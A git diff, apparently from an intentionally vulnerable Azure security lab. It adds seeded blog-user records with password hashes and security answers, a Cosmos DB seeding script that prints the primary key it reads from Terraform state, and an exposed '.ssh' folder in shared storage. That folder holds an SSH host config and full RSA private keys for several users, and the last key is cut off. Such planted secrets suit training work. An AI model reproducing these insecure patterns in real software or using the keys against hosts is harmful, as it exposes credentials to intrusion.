"5", + "name": "Quinn Baird", + "password": "$2a$10$6W4Vejfi55j0N3.7M1hXaemU9d4VTzh4cyks.ae9p5Ygiq77q4Ai2", + "phone": "0617783305", + "secretAnswer": "Huabii", + "secretQuestion": "Where is your hometown?", + "username": "quinnbaird", + "userStatus": "banned", + "creationDate": "2022-02-06T00:00:00.000Z" + }, + { + "email": "interdum.curabitur@aol.com", + "address": "Ap #434-4703 Erat St.", + "authLevel": "200", + "country": "Mexico", + "id": "6", + "name": "Raja Bauer", + "password": "$2a$10$DqZ2OS0AVflfWsK6W5YR2eKro8Eq5gQKFYAvO2h52S0umsWEYTvYu", + "phone": "0712376712", + "secretAnswer": "7", + "secretQuestion": "At what age did you first interacted with a computer?", + "username": "rajabauer", + "userStatus": "active", + "creationDate": "2022-05-12T00:00:00.000Z" + }, + { + "email": "phasellus@aol.ca", + "address": "Ap #497-8828 Dolor. Street", + "authLevel": "100", + "country": "New Zealand", + "id": "7", + "name": "Connor Cantrell", + "password": "$2a$10$5mB1SoNKWMVgFJCQXMfjB.0dWWOwujv5HFNOI6cDNyXq0p4R2k2WG", + "phone": "0788887134", + "secretAnswer": "Cricket", + "secretQuestion": "What is your favourite sport?", + "username": "conorcantrell", + "userStatus": "active", + "creationDate": "2022-04-12T00:00:00.000Z" + } +] \ No newline at end of file diff --git a/modules/module-1/resources/cosmosdb/create-table.py b/modules/module-1/resources/cosmosdb/create-table.py new file mode 100644 index 0000000..66be582 --- /dev/null +++ b/modules/module-1/resources/cosmosdb/create-table.py @@ -0,0 +1,69 @@ + +import json +from optparse import Values +import time +from urllib.parse import urljoin +import uuid +from azure.cosmos import CosmosClient, PartitionKey + + + + +# Initialize the Cosmos client +host = "" +key = "" + +with open('terraform.tfstate', 'r') as j: + contents = json.loads(j.read()) + print("reading file") + for j in contents['resources']: + for item in j : + if item == 'type' : + print(j['type']) + if j['type'] == 'azurerm_cosmosdb_account': + for k in j['instances']: + print(j['instances'][0]['attributes']['primary_key']) + key = j['instances'][0]['attributes']['primary_key'] + host = j['instances'][0]['attributes']['endpoint'] + +# +url = str(host) +primarykey = str(key) +print(url) +print(primarykey) +client = CosmosClient(url, primarykey) +# + +# Create a database +# +database_name = 'ine-cosmos-sql-db' +database = client.create_database_if_not_exists(id=database_name) +# + +# Create a container +# Using a good partition key improves the performance of database operations. +# +container_name = 'blog-users' +container = database.create_container_if_not_exists( + id=container_name, + partition_key=PartitionKey(path="/id") +) + + +db_file_json_1 = open('./modules/module-1/resources/cosmosdb/blog-users.json') +db_file_1 = json.loads(db_file_json_1.read()) +for db_item_1 in db_file_1: + container.upsert_item(body=db_item_1) + +container_name = 'blog-posts' +container = database.create_container_if_not_exists( + id=container_name, + partition_key=PartitionKey(path="/id") +) + +db_file_json_2 = open('./modules/module-1/resources/cosmosdb/blog-posts.json') +db_file_2 = json.loads(db_file_json_2.read()) +for db_item_2 in db_file_2: + container.upsert_item(body=db_item_2) + +print("Items Updated") diff --git a/modules/module-1/resources/storage_account/images/20220525172652548627.png b/modules/module-1/resources/storage_account/images/20220525172652548627.png new file mode 100644 index 0000000..8d93ac0 Binary files /dev/null and b/modules/module-1/resources/storage_account/images/20220525172652548627.png differ diff --git a/modules/module-1/resources/storage_account/images/20220525172652568597.png b/modules/module-1/resources/storage_account/images/20220525172652568597.png new file mode 100644 index 0000000..77d7297 Binary files /dev/null and b/modules/module-1/resources/storage_account/images/20220525172652568597.png differ diff --git a/modules/module-1/resources/storage_account/images/20220525173052304808.png b/modules/module-1/resources/storage_account/images/20220525173052304808.png new file mode 100644 index 0000000..a93085e Binary files /dev/null and b/modules/module-1/resources/storage_account/images/20220525173052304808.png differ diff --git a/modules/module-1/resources/storage_account/images/20220525173155599484.png b/modules/module-1/resources/storage_account/images/20220525173155599484.png new file mode 100644 index 0000000..3eaf23e Binary files /dev/null and b/modules/module-1/resources/storage_account/images/20220525173155599484.png differ diff --git a/modules/module-1/resources/storage_account/images/20220525173359279634.png b/modules/module-1/resources/storage_account/images/20220525173359279634.png new file mode 100644 index 0000000..c2eaa40 Binary files /dev/null and b/modules/module-1/resources/storage_account/images/20220525173359279634.png differ diff --git a/modules/module-1/resources/storage_account/images/20220525173435646544.png b/modules/module-1/resources/storage_account/images/20220525173435646544.png new file mode 100644 index 0000000..b64d121 Binary files /dev/null and b/modules/module-1/resources/storage_account/images/20220525173435646544.png differ diff --git a/modules/module-1/resources/storage_account/images/20220525174934318996.png b/modules/module-1/resources/storage_account/images/20220525174934318996.png new file mode 100644 index 0000000..14a966a Binary files /dev/null and b/modules/module-1/resources/storage_account/images/20220525174934318996.png differ diff --git a/modules/module-1/resources/storage_account/images/20220525175114306915.png b/modules/module-1/resources/storage_account/images/20220525175114306915.png new file mode 100644 index 0000000..2aa944f Binary files /dev/null and b/modules/module-1/resources/storage_account/images/20220525175114306915.png differ diff --git a/modules/module-1/resources/storage_account/images/20220525175420931108.png b/modules/module-1/resources/storage_account/images/20220525175420931108.png new file mode 100644 index 0000000..b62e254 Binary files /dev/null and b/modules/module-1/resources/storage_account/images/20220525175420931108.png differ diff --git a/modules/module-1/resources/storage_account/images/20220525175644356721.png b/modules/module-1/resources/storage_account/images/20220525175644356721.png new file mode 100644 index 0000000..23fccd6 Binary files /dev/null and b/modules/module-1/resources/storage_account/images/20220525175644356721.png differ diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/config.txt b/modules/module-1/resources/storage_account/shared/files/.ssh/config.txt new file mode 100644 index 0000000..47851c7 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/config.txt @@ -0,0 +1,47 @@ +Host VM_IP_ADDR + HostName justin + Port 22 + IdentityFile /shared/files/.ssh/keys/justin.pem + User justin + +Host 10.25.14.6 + HostName alice + Port 22 + IdentityFile /shared/files/.ssh/keys/alice.pem + User alice + +Host 34.207.133.229 + HostName bob + Port 22 + IdentityFile /shared/files/.ssh/keys/bob.pem + User bob + +Host 10.25.14.106 + HostName charles + Port 22 + IdentityFile /shared/files/.ssh/keys/charles.pem + User charles + +Host 172.16.84.59 + HostName john + Port 22 + IdentityFile /shared/files/.ssh/keys/john.pem + User john + +Host 172.16.87.25 + HostName mary + Port 22 + IdentityFile /shared/files/.ssh/keys/mary.pem + User mary + +Host 172.22.26.8 + HostName mike + Port 22 + IdentityFile /shared/files/.ssh/keys/mike.pem + User mike + +Host 10.0.48.71 + HostName sophia + Port 22 + IdentityFile /shared/files/.ssh/keys/sophia.pem + User sophia \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/alice.pem b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/alice.pem new file mode 100644 index 0000000..c0d965f --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/alice.pem @@ -0,0 +1,39 @@ +-----BEGIN RSA PRIVATE KEY----- +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 +-----END RSA PRIVATE KEY----- diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/alice.pub b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/alice.pub new file mode 100644 index 0000000..0cc41cb --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/alice.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDFEK8LB3UbUDjfv85CiCAd+lMyf14lVjSLPUaSLhbNZimu9M80aKzt4h6BouAk4bLLgG5j38nVX6t8OAw+aLLnfG3gIJSdW66n1qZ2w7qhcQrLIy4haBbNoIZVCavktBrZ9r/WBMxKqW2JA6ni74B/drKH6ms5L4hyBfUdWuMUMWwtpuCe2ZGLFR71tFHf0ZbOwqSLVsQS5SDZGD9ZesEYTCLcxbgyV9ne/Ba+7bFkm/LHhUVXLU24KEre4t+LE9kSg/T1HdNPk7+UClCBP2kudmVF4pY7ak7hvA/KcoGoGGo2fFGvUr6pI9V8w0JRPIlHI5bExjw+5/DB24H1k+C6N3dFbJfTeeLg51cAq8asSwiFrLoNBknSAzUvbAFjK1UWAjYwSEi0Zm1ZLZi2DdeHAf0ScSY9vH/Ca9S+Met6CZmK5iWDfykuyYxTY1WnjvbAX+D9aScJpMIWP26wytlIcqcLzDoQsdeBJgZ6mtaHCmhg9FvczX2i0eRULgoFk2k= alice diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/bob.pem b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/bob.pem new file mode 100644 index 0000000..3287857 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/bob.pem @@ -0,0 +1,39 @@ +-----BEGIN RSA PRIVATE KEY----- +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 +-----END RSA PRIVATE KEY----- diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/bob.pub b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/bob.pub new file mode 100644 index 0000000..faa4ec4 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/bob.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCidX5buIyIFnzVZhTVLtCVIniKnam9LqZrgjhXxAj+dUiQzsGlZg15Z0SAFf8siGH1+HbyH4bC8XFCmKb9CMRwK2qZma7yXkKLIvPVYEfuwQJFful1durwQTHVdRqEoiT00ADIMlr0EgbQvsW13WUHDMhBzFFNtMSzTChSdr9lc7yriMc78mc5KSZXuS1N7Dr9wci7gFz/NkbZCftOx/cc9m/eq+RqsjbjwdLgB31pFQaN41yfm6v8TcvDqQXZv12STl6A4sfRxfC0BCEc8OdII576sBRfbRAxo4zCtIrsswj+5I7pENsx1j/T0je07o5MLdVJBspJlR95SxHONoZetXx5OrU9VC20jUGnbpHN7x9DBsMTW2lBZaFWDzW/6Hc1fhblupelOov2sNK5yGZh8cZfKMLKUB4E7k27CtZFfZLV2GwG5E3GAKTa5/vgTI+U0mX32zXF2hMC1eNfQafE8B9qYVyKH7cgPP/BskINyRO+BYnqUaHVz8t/AyeRlYE= bob diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/charles.pem b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/charles.pem new file mode 100644 index 0000000..33cf1b1 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/charles.pem @@ -0,0 +1,39 @@ +-----BEGIN RSA PRIVATE KEY----- +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 +-----END RSA PRIVATE KEY----- diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/charles.pub b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/charles.pub new file mode 100644 index 0000000..9bd7189 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/charles.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDQWFk42UyXvedm2dnEpUo8C5kACYK34ATgYhy3/gIjblLDpLvoVR4aWB47pSls8vCmsIr87k6wvkIOE0mk4AjHft0Po1quN14MGVD1EUJ/WHi00zx6rN7nLu8QjHbf7YpVuFR1RFwbyNoTCRdAFuoJIoMNJwML7K0Ie0IdW/7uu8GD03ntoQbcILbBAQEed3wb+9gT4Pr7eIpvVktg3pXhpO1L5RQsAGd6n5JWfkrsH2BHbUyAbpMnKPVJrJUEek/eCDxVM2t1268JITDq/ioSnNWcjC6m/CkVrj63Tq2e3HbLoM4cZu+j91hilH2QmwQHbxCl2PMqRv2/PQ1IQa3e33IE+bZbUqpiIfBJGamU9Qfb9oeKYjUdcvvlB6bnEMTT1aOkU2f32s8wBTkPkRPK18NB9AOtICuGr2ooLbk5WHGAwghtrwLRh3XAJxq2tiiWY1Ief4SCaDvHg4r0ua8sIpMoNjp/hh9Jw3x7FxEWkhGyxIL5uKzl8t2ZAC9uchs= charles diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/john.pem b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/john.pem new file mode 100644 index 0000000..0c7e48f --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/john.pem @@ -0,0 +1,39 @@ +-----BEGIN RSA PRIVATE KEY----- +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 